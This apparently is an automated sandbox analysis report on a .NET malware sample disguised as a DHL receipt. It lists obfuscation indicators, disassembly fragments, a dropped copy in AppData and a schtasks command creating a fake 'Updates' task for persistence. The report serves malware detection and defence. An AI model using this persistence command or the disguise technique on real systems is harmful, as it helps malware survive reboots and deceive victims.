                Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 0000000A.00000002.2481415906.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687129430.000000000073E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688612074.000000000521C000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.00000000029FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2783296706.000000002336C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000A.00000002.2482295346.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2480821432.0000000004880000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2483621408.0000000004A47000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000A.00000002.2482295346.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2480821432.0000000004880000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2483621408.0000000004A47000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 0000000A.00000002.2481415906.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687129430.000000000073E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688612074.000000000521C000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.00000000029FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2783296706.000000002336C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4686746546.000000000045F000.00000002.00000001.01000000.0000000D.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4686554692.000000000045F000.00000002.00000001.01000000.0000000D.sdmp

                Data Obfuscation

                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.6a20000.4.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.25e8584.0.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, mT0HU9WLYQiSL4lvDj.cs | .Net Code: PlfRYdQVVr System.Reflection.Assembly.Load(byte[])
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, mT0HU9WLYQiSL4lvDj.cs | .Net Code: PlfRYdQVVr System.Reflection.Assembly.Load(byte[])
                Source: 11.2.oSJLRdDbLeQ.exe.341853c.0.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: DHL AWB Receipt_pdf.bat.exe | Static PE information: 0xC75FA85A [Mon Dec 30 12:36:42 2075 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_004071FF push C35DE58Bh; ret 10_2_00407237
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00403260 push eax; ret 10_2_00403262
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00408395 push ss; ret 10_2_00408397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_004124E9 push eax; retf 10_2_004124EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0040B528 pushad ; retf 10_2_0040B52A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0040D53D push esi; retf 10_2_0040D53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0041ED9A pushad ; retf 10_2_0041ED9B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0041ED9E pushad ; iretd 10_2_0041EDA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_004146A6 push cs; iretd 10_2_004146BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_00FD09AD push ecx; mov dword ptr [esp], ecx 10_2_00FD09B6
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Code function: 11_2_0732D6A0 pushfd ; iretd 11_2_0732D6AD
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Code function: 11_2_0732A842 push esp; iretd 11_2_0732A849
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Code function: 11_2_0732A888 pushfd ; iretd 11_2_0732A891
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Code function: 11_2_07330DF8 push eax; ret 11_2_07330DF9
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Code function: 11_2_0733E4A8 pushfd ; retf 11_2_0733E4B5
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe | Code function: 11_2_0733D9F1 push esp; retf 11_2_0733D9FD
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe | Code function: 14_2_0576295A push eax; retf 14_2_0576295B
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe | Code function: 14_2_0575D9AE push esi; retf 14_2_0575D9AF
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe | Code function: 14_2_0575B999 pushad ; retf 14_2_0575B99B
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe | Code function: 14_2_05758806 push ss; ret 14_2_05758808
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe | Code function: 14_2_05764B1F push cs; iretd 14_2_05764B2D
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe | Code function: 14_2_05764A8D push ebp; iretd 14_2_05764A8E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_014EC54F push 8B014767h; ret 17_2_014EC554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_014EC54D pushfd ; ret 17_2_014EC54E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_014EC9D7 push edi; ret 17_2_014EC9D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_014A09AD push ecx; mov dword ptr [esp], ecx 17_2_014A09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_0147135E push eax; iretd 17_2_01471369
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_01471FEC push eax; iretd 17_2_01471FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_014F7E99 push ecx; ret 17_2_014F7EAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 17_2_0042E0DA push ds; iretd 17_2_0042E0E1
                Source: DHL AWB Receipt_pdf.bat.exe | Static PE information: section name: .text entropy: 7.795152454250888
                Source: oSJLRdDbLeQ.exe.0.dr | Static PE information: section name: .text entropy: 7.795152454250888
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, qUcbjwDU290xnjVMSr.cs | High entropy of concatenated method names: 'sioeby0FaC', 'xT8eE3c1TO', 'QWQeTbPSvM', 'Ht7emLJeB6', 'j11eobu2iu', 'IJ7ex8o3ff', 'zrCeylcnrj', 'gVOeHY92NQ', 'lWme7aL33Y', 'JEJePs0ufR'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, aewrsNzAkF7Zt957j0.cs | High entropy of concatenated method names: 'P52nL5AgxN', 'zYNnbvVY8u', 'D0PnE86Jkd', 'hUZnTGQiBR', 'y9TnmJZfTh', 'NqsnoFcp2b', 'XZinx5rDW2', 'WBqnB5HxFu', 'ThrnttA1Z3', 'StynrsF6ys'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, zqBecF9CmkYcY2mlES.cs | High entropy of concatenated method names: 'oSUOgGBdvx', 'y8ROqRW75b', 'ToString', 'dyeOlaFQd2', 'b6EOQliDLe', 'VjKO0NZK1A', 'ATcOdIMvwj', 'GBWOpakLcq', 'MT5OhdhEnv', 'JfHOWZnCn7'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, YwrZhpQ4tCcrBZV0Xd.cs | High entropy of concatenated method names: 'Dispose', 'PW9UwLDH0j', 'vhuAmfhnyG', 'mF5wJB54CX', 'fnuU4IK6Kn', 'CNsUzy3xVG', 'ProcessDialogKey', 'zrcASr8skD', 'V5RAUAoxMf', 'XOWAAkSfqg'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, A0Hwvw0L22AZTNaH4W.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SfEAwFdO7I', 'DMGA4kcHWU', 'qnBAz00OV0', 'FKI8S0H9TO', 'Y4u8UOoRlR', 'k9N8A89BQt', 'v6Z88nOhfD', 'asDBaXMOJpABNZUnOS8'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, mT0HU9WLYQiSL4lvDj.cs | High entropy of concatenated method names: 'ia48u0GEPv', 'RJD8l9tYol', 'H6F8QawU0I', 'iNc804OyKy', 'Tye8diOwVt', 'RR28pY4eIO', 'gwI8hSsxxX', 'Hes8WWc3xP', 'WvL81nsqjb', 'd3M8gZao4N'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, Mr8skDwk5RAoxMfwOW.cs | High entropy of concatenated method names: 'j4GFTGdDaE', 'zNvFmoE2G5', 'hmGFCTSjN2', 'hUsFoYdqDE', 'sotFxLmZr9', 'DlMFZuRVsQ', 'P9VFywP8ZI', 'RUoFHlN5PD', 'OtqFc5Dcln', 'PnnF7htGOM'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, vQRBoxT1Igvqdu4vPu.cs | High entropy of concatenated method names: 'AnYpuNfiu2', 'EYNpQOEvxe', 'oNjpdvAmkp', 'TgOphUaJuy', 'It6pWwOTdv', 'JB3djQA24I', 'cNQdkjtypc', 'WgFd6fAtaW', 'bgkdVTUEFx', 'edtdwuLjhc'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, w5em9R61cXW9LDH0jl.cs | High entropy of concatenated method names: 'OliF3WguLG', 'NpMFOpbaG2', 'Le6FFKYi9F', 'FsVFvKbRDc', 'qCcFsAbjHa', 'nJmFBIfuhb', 'Dispose', 'stMIlV4RAQ', 'xxfIQxcENW', 'XPcI027xZt'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, EVTGXTkHI1iSerBPcM.cs | High entropy of concatenated method names: 'VHMOVl73cw', 'gy0O4WjHuF', 'IUbISn6DvU', 'JjOIUHbqEc', 'K5nOP2534D', 'LZ6OXXxIw8', 'qXBODG80gC', 'xUtOfegh0k', 'QHgO5lW4L4', 'BUYOipaYJF'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, vMv8YXAWuhbjim5oX7.cs | High entropy of concatenated method names: 'qwDYMZ6bD', 'gUVaC5NxO', 'rEJLjGypl', 'rOkGYGOgn', 'NviExCIFn', 'PIMNEgLMa', 'B0AraTWCYrwYClcDLA', 'tJfQ2wd7NNTh7YbRLj', 'Ue4IrN7XO', 'e2OnwvJUn'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, wq3GEtUUjbmFhdgqEuP.cs | High entropy of concatenated method names: 'w4en4l2QA2', 'bSbnzKbt25', 'NsGvSlmXhj', 'MXTvUIgmrJ', 'oylvAn2NIg', 'DBqv8WX74I', 'Ks9vRQUivV', 'dTmvu8yZHG', 'uKRvl3K0Mv', 'YhRvQEUiZX'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, USfqgP4cjdD6wgSd9w.cs | High entropy of concatenated method names: 'gHyn00llvL', 'zMQnd3OsA9', 'FfHnpmpjF5', 'iCgnhPLkCK', 'tUhnF4dXt3', 'awWnWftWHO', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, kQyDFPb4c01tALIVTH.cs | High entropy of concatenated method names: 'fSfQfKqUrp', 'wdnQ5l6hKP', 'JGqQiW2GiD', 'zCWQ9pOAof', 'IelQjlUnua', 'LLpQkAJAOi', 'Y8JQ6oPh9s', 'wQvQV1G3yC', 'Ws6QwmAM2J', 'hjHQ42FNPe'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, RxAgtEfHqZkTkCVG0f.cs | High entropy of concatenated method names: 'eQD37ICfDo', 'wtB3XiwOSZ', 'gfw3fQG32L', 'S5835h85Sj', 'Sm03mYnkay', 'su33Cp67iq', 'mMg3orFyOL', 'ek83xDdpPi', 'TEg3Zbhy63', 'V4v3y1YhyF'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, I3Q6vVURQGf9yWOYoNP.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QMA2FKn0nD', 'L1t2nIwLny', 'a7x2vc6i4R', 'Qv022LxQ00', 'Nnr2sWhO04', 'qGq2MhljDr', 'bdr2BYUMpP'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, sT2jQYEBPVZa53MGQm.cs | High entropy of concatenated method names: 'UqX0aZjUpJ', 'Nq60L4M5M4', 'uGq0b0xbwt', 'EGh0ElHtqm', 'b7e03m9OG3', 'Bun0JwhV5N', 'Ea70OkKWrC', 'Sdd0IshVuj', 'v9l0F7lAyw', 'Qfh0n2RjC4'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, W8hyW3yZl5RbMg6Z2l.cs | High entropy of concatenated method names: 'RXuhliTX5v', 'iXbh0u8xx9', 'NZmhpokAXo', 'LMAp4w9XyR', 'N9ZpzDl0Dk', 'JDhhSxTJ6Y', 'rD3hUFYwaM', 'XbihARcbKw', 'UTOh80Unr3', 'wE6hRoNcEV'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, rH1MMPNnIxKWXJ4Nrs.cs | High entropy of concatenated method names: 'VEwdKrtqcT', 'hvSdGoWlIM', 'coP0CAECa5', 'qF90oN2D6q', 'A890x2uDIn', 'Ijj0ZrmH0o', 'C2j0y8TZH0', 'kbM0HiClfY', 'HZe0cT7yaU', 'LbF07qafNB'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, AOwxT7iFU3JBbiw75C.cs | High entropy of concatenated method names: 'ToString', 'zm3JPw5lqj', 'O87JmpuiQU', 'LIDJCuSA9j', 'aDkJo5Zp3h', 'RV6Jxl2OuY', 'NdPJZMS6X6', 'BT2JyBA03X', 'gp2JHWDGgQ', 'BA9Jcv48lO'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, mGeAMkc9LMVR8hrHaX.cs | High entropy of concatenated method names: 'MohhtnDkht', 'iUchrERDXh', 'mZShYay6s0', 'uZ5hamGZYu', 'GtnhKFORII', 'H7ChLYMbrm', 'mbrhGNsZ53', 'edMhbuHeSH', 'YBMhEHf4SB', 'o6ghNsdpxM'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, TD50XXRUSsUxUojIZN.cs | High entropy of concatenated method names: 'hWWUhQyDFP', 'Yc0UW1tALI', 'zBPUgVZa53', 'wGQUqmFH1M', 'p4NU3rssQR', 'woxUJ1Igvq', 'dSDqlj0MgwaZg20pIQ', 'a06Z3JKgrKbvfc9Suv', 'I5tUUxN0E4', 'WylU80hV6C'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, qUcbjwDU290xnjVMSr.cs | High entropy of concatenated method names: 'sioeby0FaC', 'xT8eE3c1TO', 'QWQeTbPSvM', 'Ht7emLJeB6', 'j11eobu2iu', 'IJ7ex8o3ff', 'zrCeylcnrj', 'gVOeHY92NQ', 'lWme7aL33Y', 'JEJePs0ufR'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, aewrsNzAkF7Zt957j0.cs | High entropy of concatenated method names: 'P52nL5AgxN', 'zYNnbvVY8u', 'D0PnE86Jkd', 'hUZnTGQiBR', 'y9TnmJZfTh', 'NqsnoFcp2b', 'XZinx5rDW2', 'WBqnB5HxFu', 'ThrnttA1Z3', 'StynrsF6ys'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, zqBecF9CmkYcY2mlES.cs | High entropy of concatenated method names: 'oSUOgGBdvx', 'y8ROqRW75b', 'ToString', 'dyeOlaFQd2', 'b6EOQliDLe', 'VjKO0NZK1A', 'ATcOdIMvwj', 'GBWOpakLcq', 'MT5OhdhEnv', 'JfHOWZnCn7'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, YwrZhpQ4tCcrBZV0Xd.cs | High entropy of concatenated method names: 'Dispose', 'PW9UwLDH0j', 'vhuAmfhnyG', 'mF5wJB54CX', 'fnuU4IK6Kn', 'CNsUzy3xVG', 'ProcessDialogKey', 'zrcASr8skD', 'V5RAUAoxMf', 'XOWAAkSfqg'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, A0Hwvw0L22AZTNaH4W.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SfEAwFdO7I', 'DMGA4kcHWU', 'qnBAz00OV0', 'FKI8S0H9TO', 'Y4u8UOoRlR', 'k9N8A89BQt', 'v6Z88nOhfD', 'asDBaXMOJpABNZUnOS8'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, mT0HU9WLYQiSL4lvDj.cs | High entropy of concatenated method names: 'ia48u0GEPv', 'RJD8l9tYol', 'H6F8QawU0I', 'iNc804OyKy', 'Tye8diOwVt', 'RR28pY4eIO', 'gwI8hSsxxX', 'Hes8WWc3xP', 'WvL81nsqjb', 'd3M8gZao4N'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, Mr8skDwk5RAoxMfwOW.cs | High entropy of concatenated method names: 'j4GFTGdDaE', 'zNvFmoE2G5', 'hmGFCTSjN2', 'hUsFoYdqDE', 'sotFxLmZr9', 'DlMFZuRVsQ', 'P9VFywP8ZI', 'RUoFHlN5PD', 'OtqFc5Dcln', 'PnnF7htGOM'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, vQRBoxT1Igvqdu4vPu.cs | High entropy of concatenated method names: 'AnYpuNfiu2', 'EYNpQOEvxe', 'oNjpdvAmkp', 'TgOphUaJuy', 'It6pWwOTdv', 'JB3djQA24I', 'cNQdkjtypc', 'WgFd6fAtaW', 'bgkdVTUEFx', 'edtdwuLjhc'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, w5em9R61cXW9LDH0jl.cs | High entropy of concatenated method names: 'OliF3WguLG', 'NpMFOpbaG2', 'Le6FFKYi9F', 'FsVFvKbRDc', 'qCcFsAbjHa', 'nJmFBIfuhb', 'Dispose', 'stMIlV4RAQ', 'xxfIQxcENW', 'XPcI027xZt'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, EVTGXTkHI1iSerBPcM.cs | High entropy of concatenated method names: 'VHMOVl73cw', 'gy0O4WjHuF', 'IUbISn6DvU', 'JjOIUHbqEc', 'K5nOP2534D', 'LZ6OXXxIw8', 'qXBODG80gC', 'xUtOfegh0k', 'QHgO5lW4L4', 'BUYOipaYJF'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, vMv8YXAWuhbjim5oX7.cs | High entropy of concatenated method names: 'qwDYMZ6bD', 'gUVaC5NxO', 'rEJLjGypl', 'rOkGYGOgn', 'NviExCIFn', 'PIMNEgLMa', 'B0AraTWCYrwYClcDLA', 'tJfQ2wd7NNTh7YbRLj', 'Ue4IrN7XO', 'e2OnwvJUn'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, wq3GEtUUjbmFhdgqEuP.cs | High entropy of concatenated method names: 'w4en4l2QA2', 'bSbnzKbt25', 'NsGvSlmXhj', 'MXTvUIgmrJ', 'oylvAn2NIg', 'DBqv8WX74I', 'Ks9vRQUivV', 'dTmvu8yZHG', 'uKRvl3K0Mv', 'YhRvQEUiZX'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, USfqgP4cjdD6wgSd9w.cs | High entropy of concatenated method names: 'gHyn00llvL', 'zMQnd3OsA9', 'FfHnpmpjF5', 'iCgnhPLkCK', 'tUhnF4dXt3', 'awWnWftWHO', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, kQyDFPb4c01tALIVTH.cs | High entropy of concatenated method names: 'fSfQfKqUrp', 'wdnQ5l6hKP', 'JGqQiW2GiD', 'zCWQ9pOAof', 'IelQjlUnua', 'LLpQkAJAOi', 'Y8JQ6oPh9s', 'wQvQV1G3yC', 'Ws6QwmAM2J', 'hjHQ42FNPe'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, RxAgtEfHqZkTkCVG0f.cs | High entropy of concatenated method names: 'eQD37ICfDo', 'wtB3XiwOSZ', 'gfw3fQG32L', 'S5835h85Sj', 'Sm03mYnkay', 'su33Cp67iq', 'mMg3orFyOL', 'ek83xDdpPi', 'TEg3Zbhy63', 'V4v3y1YhyF'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, I3Q6vVURQGf9yWOYoNP.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QMA2FKn0nD', 'L1t2nIwLny', 'a7x2vc6i4R', 'Qv022LxQ00', 'Nnr2sWhO04', 'qGq2MhljDr', 'bdr2BYUMpP'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, sT2jQYEBPVZa53MGQm.cs | High entropy of concatenated method names: 'UqX0aZjUpJ', 'Nq60L4M5M4', 'uGq0b0xbwt', 'EGh0ElHtqm', 'b7e03m9OG3', 'Bun0JwhV5N', 'Ea70OkKWrC', 'Sdd0IshVuj', 'v9l0F7lAyw', 'Qfh0n2RjC4'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, W8hyW3yZl5RbMg6Z2l.cs | High entropy of concatenated method names: 'RXuhliTX5v', 'iXbh0u8xx9', 'NZmhpokAXo', 'LMAp4w9XyR', 'N9ZpzDl0Dk', 'JDhhSxTJ6Y', 'rD3hUFYwaM', 'XbihARcbKw', 'UTOh80Unr3', 'wE6hRoNcEV'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, rH1MMPNnIxKWXJ4Nrs.cs | High entropy of concatenated method names: 'VEwdKrtqcT', 'hvSdGoWlIM', 'coP0CAECa5', 'qF90oN2D6q', 'A890x2uDIn', 'Ijj0ZrmH0o', 'C2j0y8TZH0', 'kbM0HiClfY', 'HZe0cT7yaU', 'LbF07qafNB'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, AOwxT7iFU3JBbiw75C.cs | High entropy of concatenated method names: 'ToString', 'zm3JPw5lqj', 'O87JmpuiQU', 'LIDJCuSA9j', 'aDkJo5Zp3h', 'RV6Jxl2OuY', 'NdPJZMS6X6', 'BT2JyBA03X', 'gp2JHWDGgQ', 'BA9Jcv48lO'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, mGeAMkc9LMVR8hrHaX.cs | High entropy of concatenated method names: 'MohhtnDkht', 'iUchrERDXh', 'mZShYay6s0', 'uZ5hamGZYu', 'GtnhKFORII', 'H7ChLYMbrm', 'mbrhGNsZ53', 'edMhbuHeSH', 'YBMhEHf4SB', 'o6ghNsdpxM'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, TD50XXRUSsUxUojIZN.cs | High entropy of concatenated method names: 'hWWUhQyDFP', 'Yc0UW1tALI', 'zBPUgVZa53', 'wGQUqmFH1M', 'p4NU3rssQR', 'woxUJ1Igvq', 'dSDqlj0MgwaZg20pIQ', 'a06Z3JKgrKbvfc9Suv', 'I5tUUxN0E4', 'WylU80hV6C'
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | File created: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe

                Boot Survival

                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
